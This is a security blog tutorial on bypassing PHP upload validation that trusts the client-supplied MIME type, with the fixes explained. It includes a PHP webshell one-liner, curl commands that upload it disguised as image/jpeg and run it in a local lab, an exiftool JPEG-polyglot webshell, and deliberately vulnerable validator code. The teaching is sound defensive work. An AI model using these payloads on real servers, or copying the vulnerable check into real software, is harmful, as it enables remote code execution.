TechEarl

File Upload MIME-Type Bypass: Why $_FILES['file']['type'] Is a Lie

Ishan Karunaratne⏱️ 11 min readUpdated
Share thisCopied
File upload MIME bypass with forged Content-Type

$_FILES['file']['type'] is one of the most consistently misunderstood values in the PHP standard library. It looks like the server inspected the upload and decided what kind of file it is. It did not. The value is a verbatim copy of a header the client posted, the client is the attacker, and the attacker can put image/jpeg in front of any bytes they like. Every variant of "we only accept images" that relies on this field is one curl flag away from RCE.

This article is the MIME-validation deep dive next to the file upload vulnerabilities guide. I cover where the value actually comes from, the realistic vulnerable pattern, a working bypass against the upload-basic lab, the correct server-side alternative using libmagic, why magic-byte sniffing on its own still loses to polyglots, and how browser MIME-sniffing turns "we stored your upload as image/jpeg" into an XSS sink. The end of the article links into the sibling pieces on extension blacklists and double extensions.

TL;DR

$_FILES['file']['type'] in PHP, and its equivalent in every other web framework, is the Content-Type header the client placed inside the multipart-encoded request body. The client controls every byte of it. curl -F 'file=@shell.php;type=image/jpeg' ships PHP bytes with image/jpeg declared, and any server-side check against $_FILES['file']['type'] waves it through. The correct alternative is to read the actual file bytes with libmagic (PHP's finfo, Python's python-magic, Node's file-type) and reject anything whose magic bytes do not match an allowed type. That still does not close polyglot attacks where a real JPEG carries a PHP payload in EXIF metadata, so the magic-byte check has to be paired with a forced image re-encode and with serving uploads from a directory and content-type that cannot be interpreted as code. Browser MIME-sniffing turns this from "is the file safe to store" into "is the file safe to serve", and X-Content-Type-Options: nosniff is the header that keeps the browser from guessing past the type the server declared.

Where the MIME claim comes from

The PHP manual is unusually blunt about this. The $_FILES documentation says, in the description of the type index:

The mime type of the file, if the browser provided this information. An example would be "image/gif". This mime type is however not checked on the PHP side and therefore don't take its value for granted.

The value lives inside the multipart/form-data request body. A normal upload request looks like this on the wire:

code
POST /upload.php HTTP/1.1
Host: target.example
Content-Type: multipart/form-data; boundary=----X

------X
Content-Disposition: form-data; name="file"; filename="cat.jpg"
Content-Type: image/jpeg

<<JPEG bytes>>
------X--

PHP parses that body, populates $_FILES['file'] from it, and copies the per-part Content-Type header straight into $_FILES['file']['type']. Every framework does the same (Express multer, Django request.FILES, Rails ActionDispatch::Http::UploadedFile, ASP.NET IFormFile.ContentType). The field is whatever the client put in the per-part header. No framework re-derives it from the body before exposing the field to your code.

Curl produces any value you want with the type= segment of -F:

bash
curl -F 'file=@shell.php;type=image/jpeg' http://target.example/upload.php

The file bytes are PHP. The multipart Content-Type for this part is image/jpeg. Browsers usually set the field from the OS extension map, which is why developers see image/jpeg on .jpg uploads and convince themselves the framework is doing something defensive. It is not. The browser is, and the attacker is not using a browser.

The realistic vulnerable pattern

Here is the validator I still see in code review in 2026:

php
if ($_FILES['file']['type'] !== 'image/jpeg') {
    die('Only JPEG allowed');
}
move_uploaded_file($_FILES['file']['tmp_name'], 'uploads/' . $_FILES['file']['name']);

A small variant uses an allowlist of MIME strings:

php
$allowed = ['image/jpeg', 'image/png', 'image/gif'];
if (!in_array($_FILES['file']['type'], $allowed, true)) {
    die('Bad type');
}

The allowlist looks reassuring. It is not, because the value being matched is still the attacker's. An allowlist is only as good as the source of the value: an allowlist matched against a client-supplied claim is no better than a blocklist matched against the same claim. The shape of the check is right; the input to the check is wrong.

The same mistake shows up under different names: Symfony's UploadedFile::getClientMimeType(), Express multer's req.files[].mimetype, Flask's request.files['file'].mimetype. Every one of these reads the multipart per-part header, and every one of these is one line away from the bug.

Lab walkthrough: bypassing /upload-mime.php

The techearl-labs upload-basic container ships /upload-mime.php as a deliberately faithful copy of the realistic vulnerable pattern. Bring the lab up:

bash
docker compose up upload-basic

It listens on http://localhost:8083. The webshell I post is the same one-liner the file upload hub uses:

php
<?php echo shell_exec($_GET['c'] ?? 'id'); ?>

Save that as shell.php. Then ship it as image/jpeg:

bash
curl -F 'file=@shell.php;type=image/jpeg' http://localhost:8083/upload-mime.php
curl 'http://localhost:8083/uploads/mime/shell.php?c=id'

The first request returns OK. The second request returns the output of id running as the container's www-data user. Two HTTP calls, one obviously-PHP file accepted because the validator read a single attacker-supplied string and trusted it.

Run curl with -v to watch the bypass on the wire: the per-part Content-Type: image/jpeg sits immediately above the PHP source, and that is the byte string PHP places in $_FILES['file']['type']. Nothing in the actual file bytes influences the field.

The correct alternative: server-side magic-byte sniffing

The fix is to read the actual file bytes and infer the type from them. Most filetypes have a fixed prefix (the "magic bytes") in their first few bytes: JPEG starts with FF D8 FF, PNG with 89 50 4E 47 0D 0A 1A 0A, GIF with 47 49 46 38, PDF with 25 50 44 46. The libmagic library on Linux has a database of these signatures and is what the standard file command uses; every modern language has a binding.

In PHP:

php
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($_FILES['file']['tmp_name']);

$allowed = ['image/jpeg', 'image/png', 'image/gif', 'image/webp'];
if (!in_array($mime, $allowed, true)) {
    die('Bad type');
}

finfo reads from the temporary file on disk (the bytes the client actually sent) and returns a MIME string derived from libmagic's signature database. The attacker has no input into this value short of crafting a file whose body actually matches a JPEG signature. Posting a Content-Type: image/jpeg header on top of PHP bytes does not help: finfo ignores the header and reads the file.

In Python:

python
import magic

mime = magic.from_buffer(uploaded.read(2048), mime=True)
if mime not in {'image/jpeg', 'image/png', 'image/gif', 'image/webp'}:
    raise ValidationError('Bad type')

The python-magic package wraps the same libmagic. The 2048-byte buffer is enough for every signature in the default database.

In Node:

javascript
import { fileTypeFromBuffer } from 'file-type';

const type = await fileTypeFromBuffer(buffer);
const allowed = new Set(['image/jpeg', 'image/png', 'image/gif', 'image/webp']);
if (!type || !allowed.has(type.mime)) {
    throw new Error('Bad type');
}

file-type is the Node ecosystem's libmagic equivalent. It ships its own signature table rather than calling out to libmagic, but the principle is identical: derive the type from the bytes.

The Node mime-types package is not an equivalent: it maps file extensions and Content-Type headers to canonical MIME strings without looking at file bytes. Using it as the upload MIME check is the same bug under a different package name.

Magic bytes alone are not enough

Magic-byte sniffing closes the trivial case. It does not close polyglots, and polyglots are the bypass once a defender has read this far.

A polyglot is a file that is structurally valid as multiple formats. The simplest polyglot relevant to MIME validation is a real JPEG with PHP embedded in EXIF metadata:

bash
exiftool -Comment='<?php echo shell_exec($_GET["c"]); ?>' shell.jpg

The file's magic bytes are still FF D8 FF (JPEG SOI marker). file shell.jpg returns JPEG image data. finfo_file returns image/jpeg. python-magic returns image/jpeg. The libmagic signature database is doing the right thing: the file really is a JPEG. It is also a JPEG with <?php echo shell_exec($_GET["c"]); ?> sitting in a metadata block, and if the file ever lands in a directory the server interprets as PHP (see the double extension and AddHandler trap), or if any code path on the server does include() on it, the PHP block executes.

The defence layer that beats this is to never serve the uploaded bytes as-is. Either re-encode the image through a real image library (PIL in Python, GD or Imagick in PHP, sharp in Node) which decodes the JPEG into a pixel buffer and re-encodes it as a fresh JPEG, discarding everything that is not pixel data, or strip metadata explicitly with exiftool -all= before storing. The re-encode path is the stronger one because it also defends against polyglots that hide inside data blocks the metadata stripper does not know about.

A short note on ImageMagick: it has its own history of RCE bugs from processing untrusted input, the canonical one being ImageTragick (CVE-2016-3714). If you pick ImageMagick as the re-encode pass, keep it patched and disable the vulnerable coders in policy.xml. The same warning applies to every image library: the re-encoder is also code parsing attacker input.

Why MIME-sniffing makes this worse

The story so far has been about preventing bad uploads. The other half of the problem is preventing bad downloads, and that half is owned by the browser.

When a browser fetches a resource, the response carries a Content-Type header set by the server. Older browsers (notably Internet Explorer 6 through 8, with IE 9 already partly sniff-resistant when X-Content-Type-Options: nosniff was present, and older Safari) treated that header as advisory: if the response body did not look like the declared type, they sniffed the first few hundred bytes and guessed a more interesting one. An "image/jpeg" whose body started with <html> rendered as HTML, in the application's origin, with access to session cookies. Every "I checked the MIME type" pass that did not also harden the serving path became an XSS sink.

Modern Chrome and Firefox sniff much less aggressively, but they still sniff in a handful of cases (responses without a Content-Type header, text/plain responses that look like HTML, downloads). The defence is one response header:

code
X-Content-Type-Options: nosniff

X-Content-Type-Options: nosniff tells every modern browser to treat the server's declared Content-Type as authoritative and refuse to sniff past it. Documented at MDN's X-Content-Type-Options page. It is supported in every browser that matters and has been since around 2010. Setting it on every response from the upload-serving endpoint is the cheapest defence in the stack.

The complementary header is Content-Disposition: attachment; filename="...", which forces the browser to download the file instead of rendering it. Too aggressive for avatars or public galleries; correct for any private file (user document, support attachment, generated PDF). Combining Content-Disposition: attachment, X-Content-Type-Options: nosniff, and serving uploads from a separate isolated subdomain is the OWASP-recommended pattern for keeping the upload feature out of the XSS sink set.

Real-world incidents

One canonical CVE where the parser sitting behind a MIME check was itself the bypass, plus the recurring SVG-as-active-document pattern. NVD-verified as of writing.

SVG-as-active-document, the recurring pattern

The pattern shows up in advisory after advisory: an upload endpoint that accepts image/svg+xml (or accepts image/* and trusts the client-supplied Content-Type), serves the stored SVG back from the application origin without Content-Disposition: attachment and without Content-Security-Policy, and the browser cheerfully executes the <script> inside the SVG with full access to session cookies. The bypass is the curl one-liner from this article: post a .svg payload, forge Content-Type: image/png to slip the client-MIME check, the file lands in a public directory and the browser renders it as an active document on fetch. The fixes are the layered ones above: server-side libmagic inference, allowlist of safe image MIMEs (SVG is not safe), and X-Content-Type-Options: nosniff plus Content-Disposition: attachment on the upload-serving endpoint.

CVE-2016-3714 (ImageTragick)

ImageMagick versions before 6.9.3-10 and 7.x before 7.0.1-1 evaluated commands embedded in image files passed to vulnerable coders (MVG, MSL, HTTPS, and others), producing RCE on any server that ran user-uploaded images through ImageMagick. CVSS 3.1 score 8.4 HIGH. Relevant here because the re-encode pass that defends against the EXIF-PHP polyglot is itself a parser, and that parser had its own bypass. Keep ImageMagick patched, disable the vulnerable coders in policy.xml, and treat the re-encoder as untrusted-input-aware code.

FAQ

Where to go next

Sources

Authoritative references this article was fact-checked against.

Tagsfile-uploadmime-validationcontent-typelibmagic

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.

Keep reading

Related posts